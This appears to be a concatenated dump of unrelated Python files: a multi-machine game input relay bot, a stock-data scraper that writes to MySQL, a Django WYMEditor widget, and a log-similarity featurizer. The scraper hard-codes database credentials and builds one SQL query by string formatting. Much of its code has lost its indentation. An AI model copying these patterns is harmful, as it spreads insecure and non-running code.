        gray_image = cv2.cvtColor(save_image, cv2.COLOR_BGR2GRAY)
        (thresh, blackAndWhiteImage) = cv2.threshold(
            gray_image, 129, 255, cv2.THRESH_BINARY)
        # now invert it
        inverted = (255-blackAndWhiteImage)
        save_image = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
        rgb = cv2.cvtColor(save_image, cv2.COLOR_BGR2RGB)
        tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        result = pytesseract.image_to_string(
            rgb, lang='eng', config=tess_config)[:-2]
        return result
    def detect_bigmap_open(self):
        """Heuristic: sample two pixels where the open map's frame sits —
        dark on the left, bright near the right edge means map is open."""
        wincap = WindowCapture(self.gamename, custom_rect=[819, 263, 855, 264])
        image = wincap.get_screenshot()
        cv2.imwrite("testy.jpg", image)
        a, b, c = [int(i) for i in image[0][0]]
        d, e, f = [int(i) for i in image[0][-2]]
        if a+b+c < 30:
            if d+e+f > 700:
                # print("Working")
                return True
        return False
    def create_random_delays(self):
        """Precompute one jittered send delay per server (staggered)."""
        for index, _ in enumerate(self.list_servers):
            self.delay_spread.append(
                self.delay_spacing + (index * self.delay_spacing * uniform(0.8, 1.2)))
    def send_batch(self, server, batch, index):
        """Send a recorded batch to one server after its staggered delay."""
        delay = self.delay_spread[index]
        time.sleep(delay)
        if len(batch) > 1:
            server.send_message("batch,1\n"+batch)
    def convert_click_to_ratio(self, truex, truey):
        """Convert absolute screen click coords into (0..1) ratios of the
        game window, so servers can replay on different window sizes."""
        # This will grab the current rectangle coords of game window
        # and then turn the click values into a ratio of positions
        # versus the game window
        self.game_wincap.update_window_position(border=False)
        # Turn the screen pos into window pos
        relx = (truex - self.game_wincap.window_rect[0]) * self.scaling
        rely = (truey - self.game_wincap.window_rect[1]) * self.scaling
        # print("relx={}, rely={}".format(relx, rely))
        # print("winx={}, winy={}".format(
        #     self.game_wincap.window_rect[0], self.game_wincap.window_rect[1]))
        # print("winwidth={}".format(self.game_wincap.w))
        # Then convert to a ratio
        ratx = relx/(self.game_wincap.w*self.scaling)
        raty = rely/(self.game_wincap.h*self.scaling)
        # Test convert back to a click
        # convx, convy = self.convert_ratio_to_click(ratx, raty)
        # print("convx={}, convy={}".format(convx, convy))
        return ratx, raty
    def on_click_test(self, x, y, button, pressed):
        """Test-mode mouse handler: forward raw coords, no window checks."""
        # when pressed is False, that means it's a release event.
        # let's listen only to mouse click releases
        if self.transmitting:
            if not pressed:
                # Need to get the ratio compared to window top left
                # This will allow common usage on other size monitors
                # xratio, yratio = self.convert_click_to_ratio(x, y)
                for server in self.list_servers:
                    server.send_message("click,"+str(x)+"|"+str(y))
    def on_press_test(self, key):
        """Test-mode key handler: F4 quits; other keys relay key-down."""
        if key == keyboard.Key.f4:
            print("Exiting bot")
            for server in self.list_servers:
                server.delay = 0
                server.send_message("quit,1")
            os._exit(1)
        if self.transmitting:
            if str(key) not in self.unreleased_keys:
                for server in self.list_servers:
                    server.send_message(str(key)+",down")
                self.unreleased_keys.append(str(key))
    def on_release_test(self, key):
        """Test-mode key handler: relay key-up for tracked keys."""
        if self.transmitting:
            for server in self.list_servers:
                server.send_message(str(key)+",up")
            self.unreleased_keys.remove(str(key))
class ClientUtils():
    """Stateless helpers shared by the client entry point."""

    @staticmethod
    def grab_online_servers():
        """Return the IPs from servers.txt currently present in the ARP table.

        Runs ``arp -a`` and keeps only configured server addresses that
        the local network has recently seen.
        """
        output = subprocess.run("arp -a", capture_output=True).stdout.decode()
        with open("servers.txt", "r") as f:
            lines = f.readlines()
        # A server counts as online if its IP appears in the ARP output.
        return [ip.strip() for ip in lines if ip.strip() in output]

    @staticmethod
    def start_server_threads(list_servers):
        """Run each connection's main_loop on its own thread."""
        for server in list_servers:
            t = threading.Thread(target=server.main_loop)
            t.start()

    @staticmethod
    def get_monitor_scaling():
        """Return the Windows display scaling factor (e.g. 1.25), 2 d.p.

        Compares the DPI-virtualized screen width with the true width
        reported once the process is marked DPI-aware.
        """
        user32 = ctypes.windll.user32
        w_orig = GetSystemMetrics(0)
        user32.SetProcessDPIAware()
        [w, h] = [user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)]
        return round(w / w_orig, 2)
class RHBotClient():
    """Top-level entry point: wires server connections and input listeners."""

    @staticmethod
    def start(delay_spacing=12, test=False):
        """Connect to every online server and run the relay loop forever.

        delay_spacing -- base stagger (seconds) between batch sends to
                         successive servers.
        test -- use the test input handlers (no game window needed).
        """
        list_ips = ClientUtils.grab_online_servers()
        list_servers = []
        for ip in list_ips:
            list_servers.append(RHBotClientConnection(ip))
        ckl = ClientKeypressListener(
            list_servers, test, delay_spacing)
        ckl.start_mouse_listener()
        ckl.start_keypress_listener()
        with open("mainplayer.txt") as f:
            mainplayer = f.readline()
        # try:
        #     mainplayer = ckl.detect_name()
        # except:
        #     pass
        # for server in list_servers:
        ClientUtils.start_server_threads(list_servers)
        time.sleep(0.25)
        for server in list_servers:
            server.send_message("mainplayer,"+mainplayer)
        # Watchdog loop: once a live batch is 10 s old and no keys are
        # held down, flush it to every server on staggered threads.
        while True:
            time.sleep(0.25)
            if ckl.batch_recording_ongoing:
                if time.time() > ckl.batch_start_time + 10:
                    if len(ckl.unreleased_keys) == 0:
                        ckl.batch_start_time = time.time()
                        for i, server in enumerate(list_servers):
                            t = threading.Thread(
                                target=ckl.send_batch, args=(server, ckl.batch, i))
                            t.start()
                        ckl.batch = ""
if __name__ == "__main__":
RHBotClient.start(test=False)
| 2.09375 | 2 |
dataList_fast.py | 181654686/stoke_spider | 2 | 12772919 | import requests #导入requests包
import json
import records
import configparser
import time
from lxml import etree
import xml.sax
import time
# sz000001
# Module-level database handle shared by the whole scraper.
# NOTE(review): credentials are hard-coded in the connection URL — move
# them to configuration or environment variables before publishing.
db = records.Database("mysql://root:123456@localhost:3306/gupiao?charset=utf8")
# data = [
#     {'name': 'Jiji', 'age': 23},
#     {'name': 'Mini', 'age': 22}
# ]
# db.bulk_query("insert names(name, age) values(:name, :age)", data)
class myXmlHandler(xml.sax.ContentHandler):
    """Minimal SAX handler that remembers the most recent element name
    and the most recent character data seen by the parser."""

    def __init__(self):
        # Initialize ContentHandler's own state (e.g. its locator) —
        # the original skipped this call.
        super().__init__()
        self.CurrentName = ""
        self.CurrentData = ""

    # Called when an element starts
    def startElement(self, tag, attributes):
        self.CurrentName = tag

    # Called when an element ends (nothing to do)
    def endElement(self, tag):
        pass

    # Called when character data is read
    def characters(self, content):
        self.CurrentData = content
class stork():
def __init__(self,storkid):
self.storkid = storkid
self.dayData = {}
self.yearData = {}
self._dataList = {}
self._dataList["价格"] = "//*[@id='changyong']/p[1]/a"
self._dataList["市盈率"] = "//*[@id='changyong']/p[2]/a"
self._dataList["市净率"]= "//*[@id='changyong']/p[3]/a"
self._dataList["股息率"]= "//*[@id='changyong']/p[4]/a"
self._dataList["市值"]= "//*[@id='changyong']/p[5]/a"
self._dataList["roe"] ="//*[@id='changyong']/p[6]/a"
self._dataList["净利润"] ="//*[@id='caiwu']/p[2]/a"
self._dataList["营收"] ="//*[@id='caiwu']/p[3]/a"
self._dataList["利润扣非"] ="//*[@id='caiwu']/p[4]/a"
self._dataList["负债率"] ="//*[@id='caiwu']/p[5]/a"
self._dataList["现金流"] ="//*[@id='caiwu']/p[6]/a"
self._dataList["毛利率"] ="//*[@id='caiwu']/p[7]/a"
self._dataList["每股收益"] ="//*[@id='caiwu']/p[8]/a"
def getData(self):
url = 'https://eniu.com/gu/'+self.storkid
strhtml = requests.get(url) #Get方式获取网页数据
html = etree.HTML(strhtml.text)
for key,value in self._dataList.items():
html_data = html.xpath(value)
print(key+":"+html_data[0].text)
pass
def getPriceData(self):
"https://eniu.com/chart/pricea/sz000001/t/all"
url = "https://eniu.com/chart/pricea/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'price'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['price'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'price':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getPEAData(self):
"https://eniu.com/chart/pea/sz000001/t/all"
url = "https://eniu.com/chart/pea/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'pe_ttm'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['pea'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'pea':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getPbData(self):
"https://eniu.com/chart/pba/sz000001/t/all"
url = "https://eniu.com/chart/pba/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'pb'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['pb'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'pb':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getguxiData(self):
"https://eniu.com/chart/dva/sz000001/t/all"
url = "https://eniu.com/chart/dva/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'dv'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['guxi'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'guxi':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getvalueData(self):
"https://eniu.com/chart/marketvaluea/sz000001"
url = "https://eniu.com/chart/marketvaluea/{}".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'market_value'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['value'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'value':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getRoeaData(self):
"https://eniu.com/chart/roea/sz000001/q/4"
url = "https://eniu.com/chart/roea/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'roe'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['roe'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'roe':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
price_in = 'roa'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['roa'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'roa':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getProfitData(self):
"https://eniu.com/chart/profita/sz000001/q/4"
url = "https://eniu.com/chart/profita/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'profit'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['profit'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'profit':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getIncomeData(self):
"https://eniu.com/chart/incomea/sz000001/q/4"
url = "https://eniu.com/chart/incomea/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'income'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['income'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'income':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getprofitkfData(self):
"https://eniu.com/chart/profitkfa/sz000001/q/4"
url = "https://eniu.com/chart/profitkfa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'profit_kf'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['profit_kf'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'profit_kf':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getdebtratioData(self):
"https://eniu.com/chart/debtratioa/sz000001/q/4"
url = "https://eniu.com/chart/debtratioa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'asset'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['debtratio'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'debtratio':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getcashflowData(self):
"https://eniu.com/chart/cashflowa/sz000001/q/4"
url = "https://eniu.com/chart/cashflowa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'cash_flow'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['cashflow'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'cashflow':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getgrossprofitData(self):
"https://eniu.com/chart/grossprofitmargina/sz000001/q/4"
url = "https://eniu.com/chart/grossprofitmargina/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'net_profit_margin'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['grossprofit'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'grossprofit':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getCawuData(self):
"https://eniu.com/table/cwzba/sz000001/q/4"
url = 'https://eniu.com/table/cwzba/'+self.storkid+"/q/4"
strhtml = requests.get(url) #Get方式获取网页数据
# html = etree.HTML(strhtml.text)
try:
params_json = json.loads(strhtml.text)
except:
return
# with open("{}财务.txt".format(self.storkid),'w') as f:
# json.dump(strhtml.text,f)
if len(params_json) == 0:
return
data = []
for p in params_json:
if p['keyName'].find('<')!=-1:
continue
for k,v in p.items():
if k == 'keyName':
continue
v_temp = v
if type(v) == type("str") and v.find('<')!=-1:
saxParse = xml.sax.make_parser()
saxParse.setFeature(xml.sax.handler.feature_namespaces, 0) # 关闭命名解析
Handler = myXmlHandler()
xml.sax.parseString(v,Handler)
v_temp = Handler.CurrentData
data.append({'id':0 , 'date':str(k),
'value':str(v_temp),
'stokeid':str(self.storkid),
'caiwutype':str(p['keyName'])})
if len(data)>0:
db.bulk_query("insert stoke_caiwu_history(id,date, value,stokeid,caiwutype) \
values(:id, :date, :value,:stokeid,:caiwutype)", data)
# CREATE TABLE `gupiao`.`stoke_day_history` (
# `id` INT NOT NULL AUTO_INCREMENT,
# `day` VARCHAR(45) NULL,
# `guxi` VARCHAR(45) NULL,
# `pea` VARCHAR(45) NULL,
# `price` VARCHAR(45) NULL,
# `value` VARCHAR(45) NULL,
# `pb` VARCHAR(45) NULL,
# PRIMARY KEY (`id`));
def insertDayData(self):
data = []
for k,v in self.dayData.items():
guxi=''
pea=''
price=''
value=''
pb=''
if 'guxi' in v:
guxi = v['guxi']
if 'pea'in v:
pea = v['pea']
if 'price' in v:
price = v['price']
if 'value' in v:
value = v['value']
if 'pb' in v:
pb = v['pb']
data.append({'id':0,'day':k, 'guxi':guxi,'pea':pea,
'price':price,'value':value,'pb':pb,'stoke_id':self.storkid})
if len(data)>0:
db.bulk_query("insert stoke_day_history(id,day, guxi,pea,price,value,pb,stoke_id) \
values(:id, :day, :guxi,:pea,:price,:value,:pb,:stoke_id)", data)
pass
# CREATE TABLE `gupiao`.`stoke_year_history` (
# `id` INT NOT NULL AUTO_INCREMENT,
# `years` VARCHAR(45) NULL,
# `cashflow` VARCHAR(45) NULL,
# `debtratio` VARCHAR(45) NULL,
# `grossprofit` VARCHAR(45) NULL,
# `income` VARCHAR(45) NULL,
# `profit` VARCHAR(45) NULL,
# `profit_kf` VARCHAR(45) NULL,
# `roa` VARCHAR(45) NULL,
# `roe` VARCHAR(45) NULL,
# PRIMARY KEY (`id`));
def insertYearData(self):
data = []
for k,v in self.yearData.items():
cashflow=''
debtratio=''
grossprofit=''
income=''
profit=''
profit_kf =''
roa=''
roe = ''
if 'cashflow' in v:
cashflow = v['cashflow']
if 'debtratio' in v:
debtratio = v['debtratio']
if 'grossprofit' in v:
grossprofit = v['grossprofit']
if 'income' in v:
income = v['income']
if 'profit' in v:
profit = v['profit']
if 'profit_kf' in v:
profit_kf = v['profit_kf']
if 'roa' in v:
roa = v['roa']
if 'roe' in v:
roe = v['roe']
data.append({'id':0,'years':k, 'cashflow':cashflow,'debtratio':debtratio,
'grossprofit':grossprofit,'income':income,'profit':profit,
'profit_kf':profit_kf,'roa':roa,'roe':roe,'stoke_id':self.storkid})
if len(data)>0:
db.bulk_query("insert stoke_year_history(id,years, cashflow,debtratio,grossprofit,income,profit,profit_kf,roa,roe,stoke_id) \
values(:id,:years,:cashflow,:debtratio,:grossprofit,:income,:profit,:profit_kf,:roa,:roe,:stoke_id)", data)
    def done(self):
        """Mark this stock as processed in ``main_list`` so later runs skip it."""
        insertSql = "UPDATE main_list set done = 'ok' where stock_id='{}'"\
            .format(str(self.storkid))
        try:
            db.query(insertSql)
        except Exception as e:
            # best-effort: a failed status update is logged but not fatal
            print(e)
            pass
def getAlldata(stoke_id):
    """Run every scraper step for one stock, persist the results and mark it done."""
    scraper = stork(stoke_id)
    print('stoke_id:' + stoke_id)
    # getPriceData runs first, without a timestamp line (its print was disabled)
    scraper.getPriceData()
    timed_steps = (
        'getPEAData',
        'getPbData',
        'getguxiData',
        'getvalueData',
        'getRoeaData',
        'getProfitData',
        'getIncomeData',
        'getprofitkfData',
        'getdebtratioData',
        'getcashflowData',
        'getgrossprofitData',
    )
    for step in timed_steps:
        # announce each step with a wall-clock timestamp before running it
        print(step + ':' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
        getattr(scraper, step)()
    print('getCawuData:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    # flush the accumulated day/year data before the final table scrape
    scraper.insertDayData()
    scraper.insertYearData()
    scraper.getCawuData()
    print('end:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    scraper.done()
def getStoke():
    """Iterate over all unprocessed rows in ``main_list`` and scrape each stock."""
    Sql = "select * from main_list where done!='ok'"
    try:
        dataList = db.query(Sql)
    except Exception as e:
        # BUG FIX: previously execution fell through here with ``dataList``
        # undefined, raising a NameError below; bail out instead.
        print(e)
        return
    dd = dataList.as_dict()
    # each row looks like:
    # {'id': None, 'stock_abbr': 'pfyh', 'stock_id': 'sh600000', 'stock_name': '浦发银行',
    #  'stock_number': '600000', 'stock_pinyin': 'pufayinhang', 'dt': datetime(...)}
    for d in dd:
        getAlldata(d['stock_id'])


getStoke()
# getAlldata('hk01626')
wymeditor/widgets.py | mbi/django-wymeditor | 1 | 12772920 | <filename>wymeditor/widgets.py<gh_stars>1-10
from django import forms
from django.conf import settings
from django.contrib.admin import widgets
class WYMEditorArea(forms.Textarea):
    """Textarea widget wired up for the WYMEditor rich-text editor.

    Adds the ``WYMEditor`` CSS class to the rendered textarea so the bundled
    ``load_wymeditor.js`` can locate and initialise it, and declares the
    editor's CSS/JS assets via the inner ``Media`` class.
    """

    def __init__(self, attrs=None):
        # BUG FIX: the old signature used a mutable default (``attrs={}``) and
        # mutated it in place, so "WYMEditor" was appended to the *shared*
        # default dict on every instantiation. Copy the caller's dict instead.
        attrs = dict(attrs) if attrs else {}
        base_class = attrs.get("class", "")
        attrs['class'] = " ".join((base_class, "WYMEditor",))
        super(WYMEditorArea, self).__init__(attrs=attrs)

    class Media:
        css = {
            "all": (
                "//ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/smoothness/jquery-ui.css",
                '%swymeditor/skins/twopanels/skin.css' % settings.STATIC_URL,
            )
        }
        js = (
            '//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js',
            '%swymeditor/jquery.wymeditor.js' % settings.STATIC_URL,
            '%sjs/load_wymeditor.js' % settings.STATIC_URL,
        )
class AdminWYMEditorArea(widgets.AdminTextareaWidget, WYMEditorArea):
    """WYMEditor textarea combined with the Django admin's textarea styling."""
    pass
| 2.03125 | 2 |
boosting_decision_making/boosting_featurizer.py | fossabot/service-auto-analyzer | 0 | 12772921 | <gh_stars>0
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from utils import utils
from scipy import spatial
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
import logging
from threading import Thread
logger = logging.getLogger("analyzerApp.boosting_featurizer")
class BoostingFeaturizer:
    """Computes per-issue-type numeric features from Elasticsearch search results.

    ``all_results`` is a list of ``(log, elasticsearch_response)`` pairs.
    Text fields are vectorized once up front; individual feature functions
    (selected via ``feature_ids``) then derive scores, positions, counts and
    cosine-similarity percentages per issue type.
    """
    def __init__(self, all_results, config, feature_ids):
        # config keys used here (all optional unless noted):
        # "filter_min_should_match", "min_should_match", "min_word_length"
        self.config = config
        self.prepare_word_vectors(all_results)
        if "filter_min_should_match" in self.config:
            for field in self.config["filter_min_should_match"]:
                all_results = self.filter_by_min_should_match(all_results, field=field)
        self.all_results = self.normalize_results(all_results)
        self.scores_by_issue_type = None
        # feature id -> (feature function, kwargs); consumed by gather_features_info
        self.feature_functions = {
            0: (self._calculate_score, {}),
            1: (self._calculate_place, {}),
            3: (self._calculate_max_score_and_pos, {"return_val_name": "max_score_pos"}),
            5: (self._calculate_min_score_and_pos, {"return_val_name": "min_score_pos"}),
            7: (self._calculate_percent_count_items_and_mean, {"return_val_name": "cnt_items_percent"}),
            9: (self._calculate_percent_issue_types, {}),
            11: (self._calculate_similarity_percent, {"field_name": "message"}),
            13: (self._calculate_similarity_percent, {"field_name": "merged_small_logs"}),
            14: (self._has_test_item_several_logs, {}),
            15: (self._has_query_several_logs, {}),
            18: (self._calculate_similarity_percent, {"field_name": "detected_message"}),
            19: (self._calculate_similarity_percent, {"field_name": "detected_message_with_numbers"}),
            23: (self._calculate_similarity_percent, {"field_name": "stacktrace"}),
            25: (self._calculate_similarity_percent, {"field_name": "only_numbers"}),
            26: (self._calculate_max_score_and_pos, {"return_val_name": "max_score"}),
            27: (self._calculate_min_score_and_pos, {"return_val_name": "min_score"}),
            28: (self._calculate_percent_count_items_and_mean,
                 {"return_val_name": "mean_score"}),
        }
        if type(feature_ids) == str:
            self.feature_ids = utils.transform_string_feature_range_into_list(feature_ids)
        else:
            self.feature_ids = feature_ids
    class CountVectorizerThread(Thread):
        """Worker thread that builds a binary bag-of-words matrix per text field."""
        def __init__(self, fields, all_results, min_word_length):
            Thread.__init__(self)
            self.fields = fields
            self.min_word_length = min_word_length
            self.all_results = all_results
            # field -> binary count-vector matrix (rows indexed by the ids below)
            self.dict_count_vectorizer = {}
            # field -> {document _id -> row index in the matrix, -1 if text empty}
            self.all_text_field_ids = {}
        def run(self):
            """Vectorize each assigned field across the query log and all hits."""
            for field in self.fields:
                log_field_ids = {}
                index_in_message_array = 0
                count_vector_matrix = None
                all_messages = []
                for log, res in self.all_results:
                    for obj in [log] + res["hits"]["hits"]:
                        if obj["_id"] not in log_field_ids:
                            text = " ".join(utils.split_words(obj["_source"][field],
                                            min_word_length=self.min_word_length))
                            if text.strip() == "":
                                # empty text: mark with -1 so similarity code can skip it
                                log_field_ids[obj["_id"]] = -1
                            else:
                                all_messages.append(text)
                                log_field_ids[obj["_id"]] = index_in_message_array
                                index_in_message_array += 1
                if len(all_messages) > 0:
                    vectorizer = CountVectorizer(binary=True, analyzer="word", token_pattern="[^ ]+")
                    count_vector_matrix = np.asarray(vectorizer.fit_transform(all_messages).toarray())
                self.all_text_field_ids[field] = log_field_ids
                self.dict_count_vectorizer[field] = count_vector_matrix
    @utils.ignore_warnings
    def prepare_word_vectors(self, all_results):
        """Vectorize all similarity fields in two parallel worker threads."""
        self.all_text_field_ids = {}
        self.dict_count_vectorizer = {}
        min_word_length = self.config["min_word_length"] if "min_word_length" in self.config else 0
        threads = []
        for fields in [["message", "detected_message", "detected_message_with_numbers"],
                       ["merged_small_logs", "stacktrace", "only_numbers"]]:
            thread = BoostingFeaturizer.CountVectorizerThread(fields, all_results, min_word_length)
            threads.append(thread)
            thread.start()
        for thread in threads:
            thread.join()
        for thread in threads:
            for field in thread.fields:
                self.all_text_field_ids[field] = thread.all_text_field_ids[field]
                self.dict_count_vectorizer[field] = thread.dict_count_vectorizer[field]
    def filter_by_min_should_match(self, all_results, field="message"):
        """Drop hits whose similarity on *field* is below config["min_should_match"]."""
        all_results = self.calculate_sim_percent_logs(all_results, field=field)
        new_results = []
        for log, res in all_results:
            new_elastic_res = []
            for elastic_res in res["hits"]["hits"]:
                # fall back to the merged_small_logs similarity when the
                # field-specific one was not computed for this hit
                sim_field = "similarity_%s" % field\
                    if "similarity_%s" % field in elastic_res else "similarity_merged_small_logs"
                if elastic_res[sim_field] >= self.config["min_should_match"]:
                    new_elastic_res.append(elastic_res)
            if len(new_elastic_res) > 0:
                new_results.append((log, {"hits": {"hits": new_elastic_res}}))
        return new_results
    def calculate_sim_percent_logs(self, all_results, field="message"):
        """Annotate every (hit, log) pair with its cosine similarity on *field*."""
        rearranged_items = []
        for log, res in all_results:
            for elastic_res in res["hits"]["hits"]:
                rearranged_items.append(((elastic_res["_id"], log["_id"]), log, elastic_res))
        all_results_similarity, sim_field_dict =\
            self._calculate_field_similarity(rearranged_items,
                                             field,
                                             for_filter=True)
        # NOTE(review): sim_field_dict appears to be populated only on the
        # both-texts-empty code path in _calculate_field_similarity, yet it is
        # indexed here for every pair -- looks like a latent KeyError; confirm.
        for log, elastic_res in all_results:
            for res in elastic_res["hits"]["hits"]:
                group_id = (res["_id"], log["_id"])
                res[sim_field_dict[group_id]] = all_results_similarity[group_id]
        return all_results
    def _calculate_field_similarity(self, items, field_name, for_filter=False):
        """Return cosine similarity per (hit, log) group for *field_name*.

        Empty texts are handled specially: when both sides are empty the pair
        either falls back to merged_small_logs (filter mode) or is considered
        identical (similarity 1.0); a single empty side yields 0.0.
        """
        all_results_similarity = {}
        sim_field_dict = {}
        for group_id, log, elastic_res in items:
            sim_field = "similarity_%s" % field_name
            field_to_check = field_name
            if sim_field in elastic_res:
                # similarity already computed earlier; reuse it
                all_results_similarity[group_id] = elastic_res[sim_field]
                continue
            index_query_message = self.all_text_field_ids[field_to_check][log["_id"]]
            index_log_message = self.all_text_field_ids[field_to_check][elastic_res["_id"]]
            if index_query_message < 0 and index_log_message < 0:
                if for_filter:
                    index_query_message = self.all_text_field_ids["merged_small_logs"][log["_id"]]
                    index_log_message = self.all_text_field_ids["merged_small_logs"][elastic_res["_id"]]
                    sim_field = "similarity_merged_small_logs"
                    field_to_check = "merged_small_logs"
                else:
                    all_results_similarity[group_id] = 1.0
                    sim_field_dict[group_id] = sim_field
            if index_query_message < 0 or index_log_message < 0:
                if group_id not in all_results_similarity:
                    all_results_similarity[group_id] = 0.0
            else:
                all_results_similarity[group_id] =\
                    round(1 - spatial.distance.cosine(
                        self.dict_count_vectorizer[field_to_check][index_query_message],
                        self.dict_count_vectorizer[field_to_check][index_log_message]), 3)
        return all_results_similarity, sim_field_dict
    def _calculate_percent_issue_types(self):
        """Return the uniform share (1/number of issue types) per issue type."""
        scores_by_issue_type = self._calculate_score()
        percent_by_issue_type = {}
        for issue_type in scores_by_issue_type:
            percent_by_issue_type[issue_type] = 1 / len(scores_by_issue_type)\
                if len(scores_by_issue_type) > 0 else 0
        return percent_by_issue_type
    def _has_test_item_several_logs(self):
        """1 if the most relevant hit carries merged small logs, else 0 (per type)."""
        scores_by_issue_type = self.find_most_relevant_by_type()
        has_several_logs_by_type = {}
        for issue_type in scores_by_issue_type:
            merged_small_logs =\
                scores_by_issue_type[issue_type]["mrHit"]["_source"]["merged_small_logs"]
            has_several_logs_by_type[issue_type] = int(merged_small_logs.strip() != "")
        return has_several_logs_by_type
    def _has_query_several_logs(self):
        """1 if the queried log carries merged small logs, else 0 (per type)."""
        scores_by_issue_type = self.find_most_relevant_by_type()
        has_several_logs_by_type = {}
        for issue_type in scores_by_issue_type:
            merged_small_logs =\
                scores_by_issue_type[issue_type]["compared_log"]["_source"]["merged_small_logs"]
            has_several_logs_by_type[issue_type] = int(merged_small_logs.strip() != "")
